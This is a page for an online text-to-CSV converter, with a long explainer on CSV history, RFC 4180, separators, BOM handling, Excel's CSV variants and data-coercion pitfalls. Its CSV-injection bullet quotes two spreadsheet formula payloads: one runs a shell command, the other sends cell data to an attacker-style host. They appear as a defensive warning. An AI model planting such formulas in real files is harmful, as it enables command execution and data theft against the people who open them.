Free text to CSV converter
Convert tabular text data to CSV format. Automatic separator detection, quote handling, and a preview before you download.
About the CSV format
CSV (Comma-Separated Values) is a simple text format for storing tabular data. Each row represents a record, and the values in it are separated by commas. CSV is widely supported by spreadsheets, databases and analysis tools.
Why convert to CSV?
- Data portability · convert from any text format to CSV, ready to import into a spreadsheet.
- Universal format · CSV is supported by Excel, Google Sheets, databases and programming tools.
- Data cleaning · standardise inconsistent separators and formatting.
- API and automation · CSV is well suited to bulk operations and integrations.
- Archival format · keep tabular data in a readable, platform-independent format.
Frequently asked questions
Which separators does the tool support?
It automatically detects tab, space, comma, semicolon and pipe. You can also define a custom single-character separator.
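How a detector like this might work can be sketched in a few lines. This is an illustration only, not the tool's actual algorithm: the `guess_delimiter` name, the scoring rule (every sampled line must split into the same number of columns, most columns wins) and the tie-breaking order are all assumptions.

```python
import csv

# Candidates from the answer above. Order matters: earlier entries win ties,
# so a plain space is only chosen when nothing else fits better.
CANDIDATES = ["\t", ",", ";", "|", " "]


def guess_delimiter(text: str, sample_lines: int = 20) -> str:
    """Return the candidate that splits every sampled line into the same
    number of columns, preferring the candidate that yields more columns."""
    lines = [ln for ln in text.splitlines() if ln.strip()][:sample_lines]
    best, best_width = ",", 1  # fall back to comma when nothing splits
    for delim in CANDIDATES:
        # csv.reader respects double quotes, so "Doe, Jane" stays one field.
        widths = {len(row) for row in csv.reader(lines, delimiter=delim)}
        if len(widths) != 1:
            continue  # empty sample, or rows disagree on the column count
        width = widths.pop()
        if width > best_width:
            best, best_width = delim, width
    return best
```

A heuristic like this is easy to fool. Input such as `1,5;2,5` (decimal commas inside semicolon-separated values) splits consistently on both characters, which is one reason an explicit separator override is still worth having.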
How do I handle fields that contain a comma?
Enable the "Quote fields that contain a comma" option to wrap them in quotes, which makes them valid CSV.
Can I include a header?
Yes. Enable the "Include a header row" option if your first row contains the column names.
A short history of CSV, older than the spec that defines it
CSV is the format everyone uses and nobody owns. Its lineage is informal. The earliest documented usage of the comma-separated convention dates to 1972, when IBM Fortran (level H extended) supported list-directed input/output where commas served as separators between values on a line. Through the 1970s and 1980s, every database, spreadsheet, statistics package and accounting application that needed to swap data with another tool independently invented some variant of "values separated by some character on lines separated by some other character." There was no spec. There was no governing body. There was no canonical implementation. There was just consensus, in the loosest possible sense.
By the early 2000s, the cost of the chaos became impossible to ignore. The IETF eventually accepted a specification, RFC 4180, "Common Format and MIME Type for Comma-Separated Values (CSV) Files," published in October 2005 by Yakov Shafranovich. RFC 4180 is short, just a handful of pages, and it codified what most people had already converged on: a comma as field separator, double quote as the optional enclosure character for fields that contain commas or quotes or newlines, doubled double-quotes ("") as the way to escape a literal quote inside a quoted field, CRLF as the line terminator, and text/csv as the MIME type registered with IANA. The spec also defined an optional header parameter for the MIME type so a sender could tell a receiver whether the first line is a header row.
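The quoting rules in that paragraph are small enough to write out by hand. The sketch below is a minimal encoder under those rules only; `encode_field` and `encode_record` are illustrative names, not part of any library.

```python
def encode_field(value: str) -> str:
    """Quote a field only when it contains a comma, a double quote, CR or LF,
    doubling any embedded double quotes."""
    if any(ch in value for ch in ',"\r\n'):
        return '"' + value.replace('"', '""') + '"'
    return value


def encode_record(fields: list[str]) -> str:
    """Join encoded fields with commas and terminate the record with CRLF."""
    return ",".join(encode_field(f) for f in fields) + "\r\n"
```

For example, `encode_field('He said "hi"')` returns `"He said ""hi"""`. For ordinary rows like these, Python's `csv.writer` with its default settings produces the same output, so in practice the standard library is the safer choice.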
RFC 4180 is informational, not a strict standard. Compliance with it is voluntary. But it gives us a target, the closest thing CSV has to a definition of "correct." A later document, the W3C "Model for Tabular Data and Metadata on the Web" (CSVW, 2015), tried to extend the metadata story for CSV by attaching a JSON sidecar that says what each column is and how to interpret it. CSVW is widely cited and rarely deployed.
"CSV" in the wild doesn't mean what RFC 4180 says it means
Anyone who has had to receive a CSV from a stranger knows the shape of the problem. The disagreements break down along several axes:
- The separator character. RFC 4180 says comma. Excel installations in locales where the comma is the decimal separator (most of continental Europe, including France, Germany, Italy, Spain and the Netherlands, plus Brazil) default to writing CSV with a semicolon as the separator, because a comma would collide with numeric values like `3,14` for π. The file extension is still `.csv`; the MIME type is still `text/csv`; the content is not what an American or British recipient expects.
- Quoting. RFC 4180 says to wrap a field in double quotes when it contains the separator, a quote, or a newline, and to double any embedded quotes (so `He said "hi"` becomes `"He said ""hi"""`). In practice, many writers quote everything (paranoid), some quote nothing (and break the moment a comma appears), and a few escape with a backslash (`\"`), a C convention that breaks RFC-compliant parsers.
- Line endings. RFC 4180 mandates CRLF (`\r\n`). Excel on Windows produces CRLF. Excel on classic Mac produced CR (`\r`) only. Most Unix and Linux tools produce LF (`\n`). All three appear in files labelled `.csv`, and the variation breaks parsers that hard-code one expectation.
- Trailing newlines. Some writers terminate the last record with a line break; others don't. Parsers that count records by counting line breaks report off-by-one errors depending on the input.
- Headers. Files in the wild are split roughly evenly between those with a header row and those without. The MIME type allows a `header=present` parameter, but nobody sends MIME headers when they email you a CSV, so you have to guess.
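Several of these disagreements can be absorbed at read time. The sketch below leans on Python's standard `csv` module; `read_records` is an illustrative helper name, and the caller is assumed to already know (or to have guessed) the separator.

```python
import csv
import io


def read_records(text: str, delimiter: str = ",") -> list[list[str]]:
    """Parse CSV text that may use CRLF, LF or CR line endings, with or
    without a trailing newline, and return the non-empty records."""
    # newline="" hands line endings to the csv module untranslated, so it can
    # also keep line breaks that sit inside quoted fields.
    stream = io.StringIO(text, newline="")
    rows = csv.reader(stream, delimiter=delimiter)
    # Blank lines come back as empty lists; drop them instead of counting them.
    return [row for row in rows if row]
```

Counting `len(read_records(text))` rather than counting line breaks sidesteps the off-by-one problem, and passing `delimiter=";"` covers the decimal-comma locales. Header detection is still a guess that this sketch does not attempt.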
The BOM trap
This deserves its own section because it's the single most common source of cross-platform CSV pain. Microsoft Excel will not auto-detect a UTF-8 encoded CSV unless the file begins with a UTF-8 byte order mark: the three bytes EF BB BF, which encode Unicode character U+FEFF. Without the BOM, Excel opens the file in the legacy code page of the user's Windows locale (Windows-1252 in the West, Shift_JIS in Japan, GBK in mainland China). Any non-ASCII character (accented letters, currency symbols, emoji, CJK characters) is mangled.
The fix is to prepend the BOM. The cost is that everything else chokes on it. Apple Numbers (until recent versions) shows the BOM as a literal character in the first cell. Many command-line tools (awk, cut, older sed) treat the BOM as part of the first field, so a header that should read `name` actually reads `\ufeffname`, with an invisible U+FEFF glued to the front. Most JavaScript CSV parsers strip it; many older Python csv-module workflows don't (you have to open the file with the utf-8-sig codec). Since a free online tool can't know where the user will open the file, a reasonable default is to omit the BOM and document that Excel users should use Data → From Text/CSV (which always lets the user pick UTF-8 explicitly).
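Both sides of the trade-off fit in a few lines of Python. The helper names below are illustrative; the `utf-8-sig` codec is the standard-library piece doing the work.

```python
BOM = b"\xef\xbb\xbf"  # U+FEFF encoded as UTF-8


def to_bytes(csv_text: str, with_bom: bool = False) -> bytes:
    """Encode CSV text as UTF-8, optionally prefixed with the BOM."""
    # "utf-8-sig" writes the three BOM bytes before the payload.
    return csv_text.encode("utf-8-sig" if with_bom else "utf-8")


def from_bytes(data: bytes) -> str:
    """Decode UTF-8 CSV bytes, dropping a leading BOM if one is present."""
    # On input, "utf-8-sig" strips the BOM and is harmless when there is none.
    return data.decode("utf-8-sig")
```

Decoding the same bytes with plain `utf-8` leaves `\ufeff` attached to the first header name, which is exactly the failure described above.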
Excel ships at least four "CSV" formats
Excel's "Save As" dialog offers more than one CSV variant, and the differences matter:
- CSV (Comma delimited) (*.csv): uses the user's locale list separator (comma in en-US/en-GB, semicolon in fr-FR/de-DE/es-ES/it-IT/pt-BR). Encoding is the legacy ANSI code page. No BOM. Line endings CRLF.
- CSV UTF-8 (Comma delimited) (*.csv): same separator behaviour as above (still locale-driven, despite the name) but encoded in UTF-8 with a BOM. Introduced in Excel 2016.
- CSV (Macintosh) (*.csv): comma-separated, MacRoman encoding, classic Mac line endings (CR only). Largely obsolete but still appears.
- CSV (MS-DOS) (*.csv): comma-separated, OEM code page (CP437 in en-US, CP850 in Western Europe), CRLF.
The user-facing label says "CSV" four different ways. The actual file content is materially different. This is the practical reality the converter operates inside.
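For anyone who has to read these files back, the four variants boil down to an encoding and a line ending. The table below is a sketch under a loud assumption: it hard-codes the code pages of a Western European Windows machine (Windows-1252 for ANSI, CP850 for OEM), whereas the real values depend on the locale of the machine that saved the file. The separator is left out because it is locale-driven too.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Variant:
    encoding: str     # Python codec name
    line_ending: str  # record terminator written by that variant


# Assumption: Western European locale. Other locales use other code pages.
EXCEL_VARIANTS = {
    "CSV (Comma delimited)": Variant("cp1252", "\r\n"),
    "CSV UTF-8 (Comma delimited)": Variant("utf-8-sig", "\r\n"),
    "CSV (Macintosh)": Variant("mac_roman", "\r"),
    "CSV (MS-DOS)": Variant("cp850", "\r\n"),
}


def decode_excel_csv(data: bytes, variant_name: str) -> str:
    """Decode bytes saved as one of the variants and normalise line endings
    to LF. Line breaks inside quoted fields are normalised as well."""
    variant = EXCEL_VARIANTS[variant_name]
    text = data.decode(variant.encoding)
    return text.replace(variant.line_ending, "\n")
```

Decoding with the wrong entry does not raise an error in most cases; it quietly yields the wrong characters, which is why the variant has to be known or guessed up front.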
Why convert text → CSV, specifically
Most online "CSV tools" run the inverse direction: take a CSV, emit something else (JSON, an HTML table, a SQL INSERT, a printable PDF). This one runs the other way: take messy text, produce clean CSV. That's the use case for:
- Cleaning a list of emails into spreadsheet rows. A CRM operator copies 800 emails out of a BCC field into a notepad. Each email needs to be on its own row in a spreadsheet for upload to a mail-merge tool. Paste, add header, download.
- Converting a copied table from a PDF. PDF tables, when copied, often arrive as text where columns are separated by runs of spaces (or tabs, depending on the PDF generator). A flexible delimiter (including "consecutive whitespace") turns this into a clean grid.
- Restructuring AI-generated outputs. Large language models love to emit Markdown tables. A user can paste a Markdown table; the converter detects the pipe delimiters and the dash separator row; the output is a real CSV.
- Importing logs into Excel or Google Sheets. Apache combined log format, syslog records, and many application logs are line-oriented but not natively spreadsheet-friendly. Convert to CSV, open in a spreadsheet, sort, filter, pivot.
- Preparing data for database `COPY` statements. PostgreSQL's `COPY ... FROM STDIN WITH (FORMAT csv)` reads CSV directly. A user with a list in a text file can paste, convert and `\copy` into a table without writing a loader script.
- Building CSV by hand for batch operations. Stripe, Mailchimp, Shopify and most SaaS platforms expose CSV import for bulk operations. A user who needs to update 30 product prices manually constructs the rows; the tool turns their typed list into the exact CSV the platform expects.
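Two of the use cases above, the Markdown table and the space-aligned PDF table, can be sketched with the standard library. This is an illustration of the idea, not the converter's own code: all three function names are hypothetical, escaped pipes (`\|`) inside Markdown cells are not handled, and the "two or more spaces" threshold is an assumption.

```python
import csv
import io
import re


def markdown_table_to_rows(text: str) -> list[list[str]]:
    """Extract cell values from a pipe-delimited Markdown table."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("|"):
            continue  # not a table line
        cells = [cell.strip() for cell in line.strip("|").split("|")]
        # Skip the dash separator row, e.g. |---|:--:|
        if all(re.fullmatch(r":?-+:?", cell) for cell in cells):
            continue
        rows.append(cells)
    return rows


def split_on_space_runs(text: str, min_spaces: int = 2) -> list[list[str]]:
    """Split each line on tabs or on runs of at least `min_spaces` spaces,
    so a single space inside a value (like 'Blue pen') survives."""
    pattern = re.compile(r"\t+| {%d,}" % min_spaces)
    return [pattern.split(ln.strip()) for ln in text.splitlines() if ln.strip()]


def rows_to_csv(rows: list[list[str]]) -> str:
    """Serialise rows with the csv module's default (Excel-style) dialect."""
    buf = io.StringIO()
    csv.writer(buf).writerows(rows)
    return buf.getvalue()
```

Chaining `rows_to_csv(markdown_table_to_rows(pasted_text))` gives CSV in which a cell such as `Dev, lead` is quoted automatically.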
Excel will rewrite your data, sometimes silently
A handful of CSV foot-guns bite even careful users:
- Leading zeros disappear. A US ZIP code of `01234` opens as `1234`. A phone extension of `0049` opens as `49`. Codes that mix letters and digits, such as `00ABC`, survive because Excel treats them as text, so a single column can end up partly intact and partly damaged. The reliable defences are to prepend an apostrophe (a display hack), pre-format the column as text, or use Excel's Data → From Text/CSV import path, which lets you lock column types.
- Scientific notation auto-conversion. A long numeric string like `0123456789012` becomes `1.23457E+11` when Excel decides it's a number. The original characters are gone.
- Date auto-detection. A column containing musical time signatures `3/4`, `4/4`, `6/8`, `7/8` becomes dates: in a day-first locale, 3 April, 4 April, 6 August, 7 August. Same for serial numbers like `1-1` and times like `1:30`. This famously corrupted gene-name datasets so badly that the HUGO Gene Nomenclature Committee renamed several genes in 2020 specifically to escape Excel's coercion: gene symbols like MARCH1, SEPT2 and DEC1 had been turning into dates.
- Exponent-like identifiers. `0E5` is a valid number to Excel (scientific notation for zero), and `1E3` is read as the number 1000. A column of hexadecimal register addresses or chemistry compound codes that happens to match the digits-E-digits pattern can silently mutate.
- The CSV injection attack. A field starting with `=`, `+`, `-`, `@`, or a tab or carriage return can be interpreted by Excel and Google Sheets as a formula. A malicious value like `=cmd|'/c calc'!A0` or `=HYPERLINK("https://evil.example/?d="&A1, "Click")` can exfiltrate adjacent cell contents or run shell commands, depending on the spreadsheet client's settings. Any tool that emits CSV from user-submitted text should consider escaping leading formula characters.
- Quoted fields containing newlines. A field like `"Hello,\nworld"` with a literal newline inside the quotes is one field spanning two lines on disk. Parsers that split on newlines first and then on commas will silently corrupt the data. Correct CSV parsing is a state machine, not two passes of `String.split`.
Where this tool fits among CSV's modern alternatives
CSV survives because it's text and humans can read it. For serious data interchange, several formats have eaten its lunch on specific dimensions:
- Apache Parquet. A binary columnar format. Files are typed, compressed and column-oriented (so `SELECT col1 FROM big_file.parquet` reads only that column from disk). It is the default for analytics workloads: Snowflake, BigQuery, Databricks and Athena read it natively. It is the strongest contender for "what should you use instead of CSV when you control both ends." It is binary, so it doesn't satisfy the "I can read this in a text editor" use case.
- JSON Lines (JSONL / NDJSON). One JSON object per line. Combines the streamability of CSV with the typed, nested structure of JSON. Widely used for log ingestion, ML datasets and event streams. Trade-off: more verbose than CSV (every record repeats every key).
- Apache Arrow IPC (Feather v2). A binary in-memory and on-the-wire format for tabular data, designed for zero-copy interchange between processes and languages. Used heavily inside data-science toolchains (pandas, R's arrow package, Polars, DuckDB).
- Avro and ORC. Binary, schema-carrying formats from the Hadoop ecosystem. Less common outside data engineering.
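Of these alternatives, JSON Lines is the only one that is still plain text, and the verbosity trade-off is easy to see by converting a CSV with a header row. A minimal sketch using only the standard library (`csv_to_jsonl` is an illustrative name):

```python
import csv
import io
import json


def csv_to_jsonl(csv_text: str) -> str:
    """Turn CSV text with a header row into one JSON object per line."""
    reader = csv.DictReader(io.StringIO(csv_text, newline=""))
    # Every value is emitted as a string: CSV carries no type information,
    # so any typing has to be added by the caller.
    return "".join(json.dumps(rec, ensure_ascii=False) + "\n" for rec in reader)
```

Each output line repeats the keys `name` and `city` (or whatever the header holds), which is the per-record overhead the JSON Lines bullet refers to.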
For a free online converter aimed at developers and office workers, CSV remains the right output format because it's the lingua franca of data import everywhere. Modern alternatives exist; they have not displaced CSV in the inbox.
More questions
Should I add a UTF-8 BOM to the output?
If the file is destined for Excel double-click on Windows, yes: without the BOM, Excel opens it in the legacy code page and mangles non-ASCII text. If it's destined for anything else (Apple Numbers, command-line scripts, web upload forms), omit the BOM. The safest path is to omit the BOM and instruct Excel users to import via Data → From Text/CSV, where they can choose UTF-8 explicitly.
My CSV opens with one cell per row in Excel. What went wrong?
Almost always a separator mismatch. You're in a locale where Excel expects semicolons (most of continental Europe), but the file uses commas, or vice versa. Open with Data → From Text/CSV instead of double-clicking; that wizard lets you choose the delimiter explicitly. Or save the file from Excel's Save As menu using the variant matching your local separator.
What's the difference between TSV and CSV?
TSV uses tab characters as the separator instead of commas, with its own MIME type text/tab-separated-values and IANA registration. The advantage of TSV is that real-world data rarely contains literal tabs, so quoting is almost never needed; the disadvantage is that tabs are invisible in text editors and copy-paste behaviour varies. CSV's quoting machinery makes it safe for fields that contain the delimiter; TSV mostly avoids the problem entirely.
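The difference in quoting is visible when the same row is written both ways. The sketch below uses the two dialects that ship with Python's `csv` module, `excel` and `excel-tab`; the `write_rows` helper is an illustrative name.

```python
import csv
import io


def write_rows(rows: list[list[str]], dialect: str) -> str:
    """Serialise rows using one of the csv module's registered dialects."""
    buf = io.StringIO()
    csv.writer(buf, dialect=dialect).writerows(rows)
    return buf.getvalue()


row = [["Doe, Jane", "42"]]
as_csv = write_rows(row, "excel")      # comma-separated: the name needs quotes
as_tsv = write_rows(row, "excel-tab")  # tab-separated: no quoting required
```

Here `as_csv` is `"Doe, Jane",42` followed by CRLF, while `as_tsv` holds the same two values separated by a tab with no quotes at all. If a field ever does contain a tab, the `excel-tab` dialect falls back to CSV-style quoting.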
Is there a CSV linter I can run before sharing my file?
Yes. For command-line use, csvkit's csvclean reports rows with the wrong number of columns. Frictionless Data's frictionless CLI validates against an optional schema. For browser-based work, PapaParse reports parse errors line-by-line. Strict validation against RFC 4180 (CRLF line endings, doubled-quote escaping) is rare in practice; most parsers accept any of the common variants.
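The most basic of these checks, a consistent column count, is simple to approximate when none of those tools is at hand. The sketch below is not how csvclean or any of the tools above is implemented; `find_ragged_rows` is a hypothetical helper built on the standard `csv` module.

```python
import csv
import io


def find_ragged_rows(csv_text: str, delimiter: str = ","):
    """Return (expected_columns, problems), where problems is a list of
    (line_number, column_count) for records that disagree with the first."""
    reader = csv.reader(io.StringIO(csv_text, newline=""), delimiter=delimiter)
    expected = None
    problems = []
    for row in reader:
        if not row:
            continue  # ignore blank lines
        if expected is None:
            expected = len(row)  # the first record sets the expectation
        elif len(row) != expected:
            # line_num is the physical line on which the record ended
            problems.append((reader.line_num, len(row)))
    return expected, problems
```

An empty `problems` list only means the grid is rectangular; it says nothing about encodings, separators or the Excel coercions described earlier.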